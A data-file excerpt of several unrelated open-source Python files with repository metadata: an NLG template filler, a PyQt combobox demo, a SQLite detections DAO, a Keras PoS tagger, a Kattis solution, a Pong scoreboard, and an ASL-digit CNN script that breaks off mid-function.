concept\n noun = self._unnamed_noun(cg, surface_form)\n np.setNoun(noun)\n if spec.get(\"d\", False) == True: # set determiner\n if cg.metagraph.out_edges(surface_form, REF) or list(cg.predicates(surface_form, USER_AWARE)): # reference\n np.setDeterminer('the')\n else: # instance\n np.setDeterminer('a')\n if spec.get(\"p\", False) == True: # set as possessive\n np.setFeature(Feature.POSSESSIVE, True)\n np.setFeature(Feature.PRONOMINAL, True) # todo - is this supposed to be here?\n realizations[e_id] = self.realiser.realiseSentence(np)[:-1]\n specifications[e_id] = np\n else: # verb\n clause = self.nlgFactory.createClause()\n to_remove = set()\n if 't' in spec:\n clause.setVerb(surface_form)\n tense = match_dict.get(spec['t'], spec['t'])\n tense = expr_dict.get(tense, tense)\n if tense == 'past':\n clause.setFeature(Feature.TENSE, Tense.PAST)\n elif tense in {'present', 'now'}:\n clause.setFeature(Feature.TENSE, Tense.PRESENT)\n elif tense == 'future':\n clause.setFeature(Feature.TENSE, Tense.FUTURE)\n else:\n print(\n 'WARNING! You specified an nlg `tense` parameter that is not handled (%s).' % spec['t'])\n if 's' in spec:\n subject = realizations.get(spec['s'], spec['s'])\n clause.setSubject(subject)\n if spec['s'] in specifications:\n clause.setFeature(Feature.NUMBER, specifications[spec['s']].features['number'])\n to_remove.add(subject)\n sentence = self.realiser.realiseSentence(clause).lower()\n for r in to_remove:\n pattern = r'\\b' + r.lower() + r'\\b'\n sentence = re.sub(pattern, '', sentence)\n realizations[e_id] = sentence[:-1].strip()\n\n # Replacement of dependent variables (only verbs can be dependent and `p` and `d` markers are not relevant for verbs)\n for i, e in with_params_dependent:\n surface_form, spec = e\n e_id = str(e)\n if e_id not in realizations:\n if '.var' in surface_form:\n surface_form = surface_form[:-4]\n surface_form = match_dict[surface_form]\n clause = self.nlgFactory.createClause()\n to_remove = set()\n if 't' in spec:\n clause.setVerb(surface_form)\n tense = match_dict.get(spec['t'], spec['t'])\n tense = expr_dict.get(tense, tense)\n if tense == 'past':\n clause.setFeature(Feature.TENSE, Tense.PAST)\n elif tense in {'present', 'now'}:\n clause.setFeature(Feature.TENSE, Tense.PRESENT)\n elif tense == 'future':\n clause.setFeature(Feature.TENSE, Tense.FUTURE)\n else:\n print('WARNING! You specified an nlg `tense` parameter that is not handled (%s).'%spec['t'])\n if 's' in spec:\n subject = realizations.get(spec['s'], spec['s'])\n clause.setSubject(subject)\n if spec['s'] in specifications:\n clause.setFeature(Feature.NUMBER, specifications[spec['s']].features['number'])\n to_remove.add(subject)\n sentence = self.realiser.realiseSentence(clause).lower()\n for r in to_remove:\n pattern = r'\\b' + r.lower() + r'\\b'\n sentence = re.sub(pattern, '', sentence)\n realizations[e_id] = sentence[:-1].strip()\n\n final_str = [realizations[str(e)] for e in string_spec_ls]\n return ' '.join(final_str)\n\n def _concrete_type(self, cg, concept):\n \"\"\"\n Identify which immediate type of a concept is the most concrete (e.g. is lowest in\n the ontology hierarchy)\n \"\"\"\n namespace = cg.id_map().namespace\n immediate_types = cg.objects(concept, TYPE)\n candidates = set()\n for t in immediate_types:\n expressable_subs = {x for x in cg.subtypes_of(t) if x != t and not x.startswith(namespace)}\n intersection = immediate_types.intersection(expressable_subs)\n if len(intersection) == 0 and t not in {GROUP, 'prp', 'propds'} and not t.startswith(namespace) and '_ner' not in t:\n # there are no subtypes in the immediate types and it is not an unexpressable type\n candidates.add(t)\n return next(iter(candidates))\n\n def _process_variable_match(self, match, cg, expr_dict):\n if match in expr_dict: # the matched concept for the variable is a named concept\n return None, expr_dict[match]\n else: # not a named concept\n np = self.nlgFactory.createNounPhrase()\n noun = self._unnamed_noun(cg, match, expr_dict)\n np.setNoun(noun)\n return np, self.realiser.realiseSentence(np)[:-1]\n\n\n def _unnamed_noun(self, cg, match, expr_dict):\n # need to get main type\n match_types = cg.types(match)\n main_type = self._concrete_type(cg, match)\n main_type = expr_dict.get(main_type, main_type)\n noun = self.nlgFactory.createNLGElement(main_type, LexicalCategory.NOUN)\n # whether group\n if GROUP in match_types:\n noun.setFeature(Feature.NUMBER, NumberAgreement.PLURAL)\n else:\n noun.setFeature(Feature.NUMBER, NumberAgreement.SINGULAR)\n return noun\n\nclass Template:\n\n def __init__(self, string_spec_ls, priority, template_type, repetition_type, topic_anchor):\n self.string_spec_ls = string_spec_ls\n self.priority = priority\n self.template_type = template_type\n self.repetition_type = repetition_type\n self.topic_anchor = topic_anchor\n\n def save(self):\n return (self.string_spec_ls, self.priority, self.template_type, self.repetition_type, self.topic_anchor)\n\n def load(self, d):\n self.string_spec_ls = d[0]\n self.priority = d[1]\n self.template_type = d[2]\n self.repetition_type = d[3]\n self.topic_anchor = d[4]\n\n\nif __name__ == '__main__':\n from GRIDD.modules.responsegen_by_templates_spec import ResponseTemplatesSpec\n print(ResponseTemplatesSpec.verify(ResponseTemplateFiller))\n\n # from os.path import join\n # from GRIDD.data_structures.inference_engine import InferenceEngine\n #\n # tfind = ResponseTemplateFinder(join('GRIDD', 'resources', KB_FOLDERNAME, 'nlg_templates'))\n # infer = InferenceEngine()\n #\n # logic = '''\n # '''\n # cg = ConceptGraph(namespace='wm')\n # ConceptGraph.construct(cg, logic)\n #\n # tfill = ResponseTemplateFiller()\n # tfill.test()\n\n\n","repo_name":"emora-chat/GRIDD","sub_path":"modules/responsegen_by_templates.py","file_name":"responsegen_by_templates.py","file_ext":"py","file_size_in_byte":22286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25724489806","text":"# PyQt combobox\n\n# Example : QComboBox\n\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nclass ComboBox(QWidget): # ComboBox child class inheriting from QWidget\n def __init__(self,parent = None): # child class constructor\n super(ComboBox,self).__init__(parent) # calling parent class constructor\n\n self.Hbox = QHBoxLayout() # initializing QHBoxLayout (horizontal box)\n self.cb = QComboBox() # initializing QComboBox\n self.cb.addItem('c') # adding item in combobox\n self.cb.addItem('C++')\n self.cb.addItem('Python')\n self.cb.addItem('Java')\n self.cb.currentIndexChanged.connect(self.selectionchange) # index value of choosed item\n\n self.Hbox.addWidget(self.cb) # adding combobox to Hbox\n self.setLayout(self.Hbox) # setting Hbox on a window\n self.setWindowTitle('PyQt ComboBox') # window title\n self.setGeometry(200,200,340,200) # window position and size\n\n def selectionchange(self,i): # function taking index value coming from 'currentIndexChanged' as a argument\n print('Item in the list are:') # simple print statement\n\n for count in range(self.cb.count()): # loop for counting the combobox items\n print(self.cb.itemText(count)) # printing box item\n \n print('Current index',i,'selection changed',self.cb.currentText()) # print statement with index value and selected item from the box\n\ndef main(): # function main\n app = QApplication(sys.argv) # initializing PyQt\n ComboBox_obj = ComboBox() # class object\n ComboBox_obj.show() # calling show () function using class object\n sys.exit(app.exec_()) # exit window\n\nif __name__ == \"__main__\":\n main() # main function call","repo_name":"ankit-0044/Python","sub_path":"Python Gui/07.01_QComboBox.py","file_name":"07.01_QComboBox.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17733516629","text":"import uuid\nimport settings\n\nfrom dao_utils import execute_query\nfrom images_dao import table_name as images_table_name\nfrom images_dao import time_column as images_time_column\nfrom images_dao import filename_column as images_filename_column\n\ntable_name = 'detections'\nimage_column = 'image'\nid_column = 'id'\nobject_type_column = 'object_type'\nbounding_box_column = 'boundingbox'\ncolumns = [id_column, image_column, object_type_column, bounding_box_column]\n\n\ndef save_or_update(filename, object_type, bounding_box=None):\n new_id = uuid.uuid4()\n query = 'INSERT INTO {} VALUES (\"{}\", \"{}\", \"{}\", \"{}\")' \\\n .format(table_name, new_id, filename, object_type, bounding_box)\n execute_query(settings.database, query)\n return new_id\n\n\ndef get_all_detections(max_results=5):\n query = 'SELECT * FROM {} DESC LIMIT {}'.format(table_name, max_results)\n results = execute_query(settings.database, query)\n return results\n\n\ndef get_last_detections(max_results=5):\n query = 'SELECT * FROM {} INNER JOIN {} ON {}.image={}.filename ORDER BY {} DESC LIMIT {}' \\\n .format(table_name, images_table_name, table_name, images_table_name, images_time_column, max_results)\n results = execute_query(settings.database, query)\n return results\n\n\ndef setup():\n create_table()\n\n\ndef create_table():\n \"\"\"Create a table\"\"\"\n foreign_key_query = 'FOREIGN KEY(%s) REFERENCES %s(%s)' % (image_column, images_table_name, images_filename_column)\n query = \"CREATE TABLE %s (%s VARCHAR(32) PRIMARY KEY, %s VARCHAR(32), %s VARCHAR(64), %s VARCHAR(32), %s)\" % (\n table_name, id_column, image_column, object_type_column, bounding_box_column, foreign_key_query)\n execute_query(settings.database, query)\n","repo_name":"cmeijer/camera","sub_path":"detections_dao.py","file_name":"detections_dao.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20660306470","text":"# -*- coding: utf-8 -*-\n# Автор: Гусев Илья\n# Описание: Модель PoS-теггера на основе BiLSTM.\n\nfrom typing import List, Tuple\nimport os\n\nimport numpy as np\nfrom pymorphy2 import MorphAnalyzer\nfrom russian_tagsets import converters\nfrom keras.layers import Input, Embedding, Dense, LSTM, BatchNormalization, Activation, \\\n concatenate, Bidirectional, TimeDistributed, Dropout\nfrom keras.models import Model, model_from_json\ntry:\n from keras.optimizers import Adam\nexcept:\n from keras.optimizer_v2.adam import Adam\nfrom keras import backend as K\n\nfrom rnnmorph.batch_generator import BatchGenerator\nfrom rnnmorph.data_preparation.grammeme_vectorizer import GrammemeVectorizer\nfrom rnnmorph.data_preparation.word_vocabulary import WordVocabulary\nfrom rnnmorph.data_preparation.loader import Loader\nfrom rnnmorph.char_embeddings_model import build_dense_chars_layer, get_char_model\nfrom rnnmorph.config import BuildModelConfig, TrainConfig\n\n\nclass ReversedLSTM(LSTM):\n def __init__(self, units, **kwargs):\n kwargs['go_backwards'] = True\n super().__init__(units, **kwargs)\n\n def call(self, inputs, **kwargs):\n y_rev = super().call(inputs, **kwargs)\n return K.reverse(y_rev, 1)\n\n\nclass LSTMMorphoAnalysis:\n def __init__(self, language: str):\n self.language = language # type: str\n self.morph = MorphAnalyzer() if language == \"ru\" else None # type: MorphAnalyzer\n self.converter = converters.converter('opencorpora-int', 'ud14') if self.language == \"ru\" else None\n self.grammeme_vectorizer_input = GrammemeVectorizer() # type: GrammemeVectorizer\n self.grammeme_vectorizer_output = GrammemeVectorizer() # type: GrammemeVectorizer\n self.word_vocabulary = WordVocabulary() # type: WordVocabulary\n self.char_set = \"\" # type: str\n self.train_model = None # type: Model\n self.eval_model = None # type: Model\n\n def prepare(self, gram_dump_path_input: str, gram_dump_path_output: str,\n word_vocabulary_dump_path: str, char_set_dump_path: str,\n file_names: List[str] = None) -> None:\n \"\"\"\n Подготовка векторизатора грамматических значений и словаря слов по корпусу.\n \"\"\"\n if os.path.exists(gram_dump_path_input):\n self.grammeme_vectorizer_input.load(gram_dump_path_input)\n if os.path.exists(gram_dump_path_output):\n self.grammeme_vectorizer_output.load(gram_dump_path_output)\n if os.path.exists(word_vocabulary_dump_path):\n self.word_vocabulary.load(word_vocabulary_dump_path)\n if os.path.exists(char_set_dump_path):\n with open(char_set_dump_path, 'r', encoding='utf-8') as f:\n self.char_set = f.read().rstrip()\n if self.grammeme_vectorizer_input.is_empty() or \\\n self.grammeme_vectorizer_output.is_empty() or \\\n self.word_vocabulary.is_empty() or\\\n not self.char_set:\n loader = Loader(self.language)\n loader.parse_corpora(file_names)\n\n self.grammeme_vectorizer_input = loader.grammeme_vectorizer_input\n self.grammeme_vectorizer_input.save(gram_dump_path_input)\n self.grammeme_vectorizer_output = loader.grammeme_vectorizer_output\n self.grammeme_vectorizer_output.save(gram_dump_path_output)\n self.word_vocabulary = loader.word_vocabulary\n self.word_vocabulary.save(word_vocabulary_dump_path)\n self.char_set = loader.char_set\n with open(char_set_dump_path, 'w', encoding='utf-8') as f:\n f.write(self.char_set)\n\n def save(self, model_config_path: str, model_weights_path: str,\n eval_model_config_path: str, eval_model_weights_path: str):\n if self.eval_model is not None:\n with open(eval_model_config_path, \"w\", encoding='utf-8') as f:\n f.write(self.eval_model.to_json())\n self.eval_model.save_weights(eval_model_weights_path)\n if self.train_model is not None:\n with open(model_config_path, \"w\", encoding='utf-8') as f:\n f.write(self.train_model.to_json())\n self.train_model.save_weights(model_weights_path)\n\n def load_train(self, config: BuildModelConfig, model_config_path: str=None, model_weights_path: str=None):\n with open(model_config_path, \"r\", encoding='utf-8') as f:\n if config.use_crf:\n from keras_contrib.layers import CRF\n custom_objects = {'ReversedLSTM': ReversedLSTM, 'CRF': CRF}\n self.train_model = model_from_json(f.read(), custom_objects=custom_objects)\n else:\n custom_objects = {'ReversedLSTM': ReversedLSTM}\n self.train_model = model_from_json(f.read(), custom_objects=custom_objects)\n self.train_model.load_weights(model_weights_path)\n\n loss = {}\n metrics = {}\n if config.use_crf:\n out_layer_name = 'crf'\n offset = 0\n if config.use_pos_lm:\n offset += 2\n if config.use_word_lm:\n offset += 2\n loss[out_layer_name] = self.train_model.layers[-1-offset].loss_function\n metrics[out_layer_name] = self.train_model.layers[-1-offset].accuracy\n else:\n out_layer_name = 'main_pred'\n loss[out_layer_name] = 'sparse_categorical_crossentropy'\n metrics[out_layer_name] = 'accuracy'\n\n if config.use_pos_lm:\n prev_layer_name = 'shifted_pred_prev'\n next_layer_name = 'shifted_pred_next'\n loss[prev_layer_name] = loss[next_layer_name] = 'sparse_categorical_crossentropy'\n metrics[prev_layer_name] = metrics[next_layer_name] = 'accuracy'\n self.train_model.compile(Adam(clipnorm=5.), loss=loss, metrics=metrics)\n\n self.eval_model = Model(inputs=self.train_model.inputs, outputs=self.train_model.outputs[0])\n\n def load_eval(self, config: BuildModelConfig, eval_model_config_path: str,\n eval_model_weights_path: str) -> None:\n with open(eval_model_config_path, \"r\", encoding='utf-8') as f:\n if config.use_crf:\n from keras_contrib.layers import CRF\n custom_objects = {'ReversedLSTM': ReversedLSTM, 'CRF': CRF}\n self.eval_model = model_from_json(f.read(), custom_objects=custom_objects)\n else:\n custom_objects = {'ReversedLSTM': ReversedLSTM}\n self.eval_model = model_from_json(f.read(), custom_objects=custom_objects)\n self.eval_model.load_weights(eval_model_weights_path)\n \n def build(self, config: BuildModelConfig, word_embeddings=None):\n \"\"\"\n Описание модели.\n\n :param config: конфиг модели.\n :param word_embeddings: матрица словных эмбеддингов.\n \"\"\"\n inputs = []\n embeddings = []\n\n if config.use_word_embeddings and word_embeddings is not None:\n words = Input(shape=(None,), name='words')\n word_vocabulary_size = word_embeddings.size.shape[0]\n word_embeddings_dim = word_embeddings.size.shape[1]\n words_embedding = Embedding(word_vocabulary_size, word_embeddings_dim, name='word_embeddings')(words)\n embeddings.append(words_embedding)\n\n if config.use_gram:\n grammemes_input = Input(shape=(None, self.grammeme_vectorizer_input.grammemes_count()), name='grammemes')\n grammemes_embedding = Dropout(config.gram_dropout)(grammemes_input)\n grammemes_embedding = Dense(config.gram_hidden_size, activation='relu')(grammemes_embedding)\n inputs.append(grammemes_input)\n embeddings.append(grammemes_embedding)\n\n if config.use_chars:\n chars_input = Input(shape=(None, config.char_max_word_length), name='chars')\n\n char_layer = build_dense_chars_layer(\n max_word_length=config.char_max_word_length,\n char_vocab_size=len(self.char_set)+1,\n char_emb_dim=config.char_embedding_dim,\n hidden_dim=config.char_function_hidden_size,\n output_dim=config.char_function_output_size,\n dropout=config.char_dropout)\n if config.use_trained_char_embeddings:\n char_layer = get_char_model(\n char_layer=char_layer,\n max_word_length=config.char_max_word_length,\n embeddings=word_embeddings,\n model_config_path=config.char_model_config_path,\n model_weights_path=config.char_model_weights_path,\n vocabulary=self.word_vocabulary,\n char_set=self.char_set)\n chars_embedding = char_layer(chars_input)\n inputs.append(chars_input)\n embeddings.append(chars_embedding)\n\n if len(embeddings) > 1:\n layer = concatenate(embeddings, name=\"LSTM_input\")\n else:\n layer = embeddings[0]\n\n lstm_input = Dense(config.rnn_input_size, activation='relu')(layer)\n lstm_forward_1 = LSTM(config.rnn_hidden_size, dropout=config.rnn_dropout,\n recurrent_dropout=config.rnn_dropout, return_sequences=True,\n name='LSTM_1_forward')(lstm_input)\n\n lstm_backward_1 = ReversedLSTM(config.rnn_hidden_size, dropout=config.rnn_dropout,\n recurrent_dropout=config.rnn_dropout, return_sequences=True,\n name='LSTM_1_backward')(lstm_input)\n layer = concatenate([lstm_forward_1, lstm_backward_1], name=\"BiLSTM_input\")\n\n for i in range(config.rnn_n_layers-1):\n layer = Bidirectional(LSTM(\n config.rnn_hidden_size,\n dropout=config.rnn_dropout,\n recurrent_dropout=config.rnn_dropout,\n return_sequences=True,\n name='LSTM_'+str(i)))(layer)\n\n layer = TimeDistributed(Dense(config.dense_size))(layer)\n layer = TimeDistributed(Dropout(config.dense_dropout))(layer)\n layer = TimeDistributed(BatchNormalization())(layer)\n layer = TimeDistributed(Activation('relu'))(layer)\n\n outputs = []\n loss = {}\n metrics = {}\n num_of_classes = self.grammeme_vectorizer_output.size() + 1\n\n if config.use_crf:\n from keras_contrib.layers import CRF\n out_layer_name = 'crf'\n crf_layer = CRF(num_of_classes, sparse_target=True, name=out_layer_name)\n outputs.append(crf_layer(layer))\n loss[out_layer_name] = crf_layer.loss_function\n metrics[out_layer_name] = crf_layer.accuracy\n else:\n out_layer_name = 'main_pred'\n outputs.append(Dense(num_of_classes, activation='softmax', name=out_layer_name)(layer))\n loss[out_layer_name] = 'sparse_categorical_crossentropy'\n metrics[out_layer_name] = 'accuracy'\n\n if config.use_pos_lm:\n prev_layer_name = 'shifted_pred_prev'\n next_layer_name = 'shifted_pred_next'\n prev_layer = Dense(num_of_classes, activation='softmax', name=prev_layer_name)\n next_layer = Dense(num_of_classes, activation='softmax', name=next_layer_name)\n outputs.append(prev_layer(Dense(config.dense_size, activation='relu')(lstm_backward_1)))\n outputs.append(next_layer(Dense(config.dense_size, activation='relu')(lstm_forward_1)))\n loss[prev_layer_name] = loss[next_layer_name] = 'sparse_categorical_crossentropy'\n metrics[prev_layer_name] = metrics[next_layer_name] = 'accuracy'\n\n if config.use_word_lm:\n out_layer_name = 'out_embedding'\n out_embedding = Dense(word_embeddings.shape[0],\n weights=[word_embeddings.T, np.zeros(word_embeddings.shape[0])],\n activation='softmax', name=out_layer_name, trainable=False)\n outputs.append(out_embedding(Dense(word_embeddings.shape[1], activation='relu')(lstm_backward_1)))\n outputs.append(out_embedding(Dense(word_embeddings.shape[1], activation='relu')(lstm_forward_1)))\n loss[out_layer_name] = 'sparse_categorical_crossentropy'\n metrics[out_layer_name] = 'accuracy'\n\n self.train_model = Model(inputs=inputs, outputs=outputs)\n self.train_model.compile(Adam(clipnorm=5.), loss=loss, metrics=metrics)\n self.eval_model = Model(inputs=inputs, outputs=outputs[0])\n print(self.train_model.summary())\n\n def train(self, file_names: List[str], train_config: TrainConfig, build_config: BuildModelConfig) -> None:\n np.random.seed(train_config.random_seed)\n sample_counter = self.count_samples(file_names)\n train_idx, val_idx = self.get_split(sample_counter, train_config.val_part)\n for big_epoch in range(train_config.epochs_num):\n print('------------Big Epoch {}------------'.format(big_epoch))\n batch_generator = BatchGenerator(\n language=self.language,\n file_names=file_names,\n config=train_config,\n grammeme_vectorizer_input=self.grammeme_vectorizer_input,\n grammeme_vectorizer_output=self.grammeme_vectorizer_output,\n build_config=build_config,\n indices=train_idx,\n word_vocabulary=self.word_vocabulary,\n char_set=self.char_set)\n for epoch, (inputs, target) in enumerate(batch_generator):\n self.train_model.fit(inputs, target, batch_size=train_config.batch_size, epochs=1, verbose=2)\n if epoch != 0 and epoch % train_config.dump_model_freq == 0:\n self.save(train_config.train_model_config_path, train_config.train_model_weights_path,\n train_config.eval_model_config_path, train_config.eval_model_weights_path)\n self.evaluate(\n file_names=file_names,\n val_idx=val_idx,\n train_config=train_config,\n build_config=build_config)\n\n @staticmethod\n def count_samples(file_names: List[str]):\n \"\"\"\n Считает количество предложений в выборке.\n\n :param file_names: файлы выборки.\n :return: количество предложений.\n \"\"\"\n sample_counter = 0\n for filename in file_names:\n with open(filename, \"r\", encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n sample_counter += 1\n return sample_counter\n\n @staticmethod\n def get_split(sample_counter: int, val_part: float) -> Tuple[np.array, np.array]:\n \"\"\"\n Выдаёт индексы предложений, которые становятся train или val выборкой.\n\n :param sample_counter: количество предложений.\n :param val_part: часть выборки, которая станет val.\n :return: индексы выборок.\n \"\"\"\n perm = np.random.permutation(sample_counter)\n border = int(sample_counter * (1 - val_part))\n train_idx = perm[:border]\n val_idx = perm[border:]\n return train_idx, val_idx\n\n def evaluate(self, file_names, val_idx, train_config: TrainConfig, build_config: BuildModelConfig) -> None:\n \"\"\"\n Оценка на val выборке.\n\n :param file_names: файлы выборки.\n :param val_idx: val индексы.\n :param train_config: конфиг обучения.\n :param build_config: конфиг модели.\n \"\"\"\n word_count = 0\n word_errors = 0\n sentence_count = 0\n sentence_errors = 0\n batch_generator = BatchGenerator(\n language=self.language,\n file_names=file_names,\n config=train_config,\n grammeme_vectorizer_input=self.grammeme_vectorizer_input,\n grammeme_vectorizer_output=self.grammeme_vectorizer_output,\n build_config=build_config,\n indices=val_idx,\n word_vocabulary=self.word_vocabulary,\n char_set=self.char_set)\n for epoch, (inputs, target) in enumerate(batch_generator):\n predicted_y = self.eval_model.predict(inputs, batch_size=train_config.batch_size, verbose=0)\n for i, sentence in enumerate(target[0]):\n sentence_has_errors = False\n count_zero = sum([1 for num in sentence if num == [0]])\n real_sentence_tags = sentence[count_zero:]\n answer = []\n for grammeme_probs in predicted_y[i][count_zero:]:\n num = np.argmax(grammeme_probs)\n answer.append(num)\n for tag, predicted_tag in zip(real_sentence_tags, answer):\n tag = tag[0]\n word_count += 1\n if tag != predicted_tag:\n word_errors += 1\n sentence_has_errors = True\n sentence_count += 1\n if sentence_has_errors:\n sentence_errors += 1\n\n print(\"Word accuracy: \", 1.0 - float(word_errors) / word_count)\n print(\"Sentence accuracy: \", 1.0 - float(sentence_errors) / sentence_count)\n\n def predict_probabilities(self, sentences: List[List[str]], batch_size: int,\n build_config: BuildModelConfig) -> List[List[List[float]]]:\n \"\"\"\n Предсказание полных PoS-тегов по предложению с вероятностями всех вариантов.\n\n :param sentences: массив предложений (которые являются массивом слов).\n :param build_config: конфиг архитектуры модели.\n :param batch_size: размер батча.\n :return: вероятности тегов.\n \"\"\"\n max_sentence_len = max([len(sentence) for sentence in sentences])\n if max_sentence_len == 0:\n return [[] for _ in sentences]\n n_samples = len(sentences)\n\n words = np.zeros((n_samples, max_sentence_len), dtype=np.int)\n grammemes = np.zeros((n_samples, max_sentence_len, self.grammeme_vectorizer_input.grammemes_count()),\n dtype=np.float)\n chars = np.zeros((n_samples, max_sentence_len, build_config.char_max_word_length), dtype=np.int)\n\n for i, sentence in enumerate(sentences):\n if not sentence:\n continue\n word_indices, gram_vectors, char_vectors = BatchGenerator.get_sample(\n sentence,\n language=self.language,\n converter=self.converter,\n morph=self.morph,\n grammeme_vectorizer=self.grammeme_vectorizer_input,\n max_word_len=build_config.char_max_word_length,\n word_vocabulary=self.word_vocabulary,\n word_count=build_config.word_max_count,\n char_set=self.char_set)\n words[i, -len(sentence):] = word_indices\n grammemes[i, -len(sentence):] = gram_vectors\n chars[i, -len(sentence):] = char_vectors\n\n inputs = []\n if build_config.use_word_embeddings:\n inputs.append(words)\n if build_config.use_gram:\n inputs.append(grammemes)\n if build_config.use_chars:\n inputs.append(chars)\n return self.eval_model.predict(inputs, batch_size=batch_size)\n","repo_name":"IlyaGusev/rnnmorph","sub_path":"rnnmorph/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":19993,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"37"} +{"seq_id":"35137520636","text":"\"\"\"\n/*\tTurner Atwood\n *\t9/11/18\n *\tABC [1.7]: (https://open.kattis.com/problems/abc)\n */\t\n\"\"\"\n\ndef main():\n\tnums = sorted([(int)(i) for i in input().split(\" \")])\n\tletters = [i for i in input()]\n\tlet = ['A', 'B', 'C']\n\tletter_map = {let[i]:nums[i] for i in [0,1,2]}\n\tprint(\" \".join([str(letter_map[i]) for i in letters]))\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"TurnerAtwood/Kattis","sub_path":"Trivial/ABC.py","file_name":"ABC.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7418084859","text":"from turtle import Turtle\r\n\r\nALIGNMENT = 'center'\r\nFONT = ('Courier', 40, 'normal')\r\nFINAL_SCORE = 10\r\n\r\n\r\nclass ScoreBoard(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.r_score = 0\r\n self.l_score = 0\r\n self.color('white')\r\n self.penup()\r\n self.hideturtle()\r\n\r\n def scores(self):\r\n self.clear()\r\n self.setpos(0, 275)\r\n self.write('Score', align=ALIGNMENT, font=('Courier', 20, 'normal'))\r\n self.setpos(2, 200)\r\n self.write(f\"{self.l_score} : {self.r_score}\", align=ALIGNMENT, font=FONT)\r\n\r\n def hit_a_r_score(self):\r\n self.r_score += 1\r\n self.scores()\r\n\r\n def hit_a_l_score(self):\r\n self.l_score += 1\r\n self.scores()\r\n\r\n def game_end(self):\r\n if self.r_score == FINAL_SCORE:\r\n self.setpos(0, 0)\r\n self.write(\"Right player wins!\", align=ALIGNMENT, font=FONT)\r\n return True\r\n\r\n if self.l_score == FINAL_SCORE:\r\n self.setpos(0, 0)\r\n self.write(\"Left player wins!\", align=ALIGNMENT, font=FONT)\r\n return True\r\n","repo_name":"sandu-o-O/Pong-Ball","sub_path":"pongball_game/score_board.py","file_name":"score_board.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3616711203","text":"import numpy as np\nimport pandas as pd\nimport math\nimport string\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D , MaxPool2D , Flatten , Dropout , BatchNormalization\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report,confusion_matrix\nfrom keras.callbacks import ReduceLROnPlateau\n\nfrom sklearn.preprocessing import LabelBinarizer\n\n\nEPOCHS = 4\nCASES = {index:letter.upper() for index,letter in enumerate(string.ascii_lowercase)}\nMODEL_PATH = \"piccolo/model.pickle\"\nHISTORY_PATH = \"piccolo/history.pickle\"\n\n\n# creates test/train split\ndef train_test_split():\n train_df = pd.read_csv(\"./data/sign_mnist_train.csv\")\n test_df = pd.read_csv(\"./data/sign_mnist_test.csv\")\n y = test_df['label']\n y_train = train_df['label']\n y_test = test_df['label']\n del train_df['label']\n del test_df['label']\n x_train = train_df.values\n x_test = test_df.values\n\n return x_train, y_train, x_test, y_test, y\n\n\ndef preprocessing(x_train, y_train, x_test, y_test):\n # basically becomes a correct or not problem\n label_binarizer = LabelBinarizer()\n y_train = label_binarizer.fit_transform(y_train)\n y_test = label_binarizer.fit_transform(y_test)\n\n # normalizes range of RGB vals\n x_train = x_train / 255\n x_test = x_test / 255\n x_train = x_train.reshape(-1,28,28,1)\n x_test = x_test.reshape(-1,28,28,1)\n\n return x_train, y_train, x_test, y_test\n\n\ndef augment_data(x_train):\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\n zoom_range = 0.1, # Randomly zoom image \n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=False, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n datagen.fit(x_train)\n\n return datagen\n\n\ndef train_cnn(x_train, y_train, x_test, y_test, extra_data, load_from=None):\n if not load_from:\n learning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', patience = 2, verbose=1,factor=0.5, min_lr=0.00001)\n\n model = Sequential()\n model.add(Conv2D(75 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu' , input_shape = (28,28,1)))\n model.add(BatchNormalization())\n model.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\n model.add(Conv2D(50 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\n model.add(Dropout(0.2))\n model.add(BatchNormalization())\n model.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\n model.add(Conv2D(25 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\n model.add(BatchNormalization())\n model.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\n model.add(Flatten())\n model.add(Dense(units = 512 , activation = 'relu'))\n model.add(Dropout(0.3))\n model.add(Dense(units = 24 , activation = 'softmax'))\n model.compile(optimizer = 'adam' , loss = 'categorical_crossentropy' , metrics = ['accuracy'])\n model.summary()\n\n history = model.fit(extra_data.flow(x_train, y_train, batch_size = 128),\n epochs = EPOCHS, validation_data = (x_test, y_test) ,\n callbacks = [learning_rate_reduction])\n if load_from:\n # checks if the read fails\n success = read_model_history(model_path=load_from[0],\n history_path=load_from[1])\n if success:\n model, history = success[0], success[1]\n else:\n return train_cnn(x_train, y_train, x_test, y_test, extra_data)\n\n accuracy = model.evaluate(x_test, y_test)[1] * 100\n\n predictions = model.predict(x_test)\n\n return model, predictions, history, accuracy\n\n\ndef 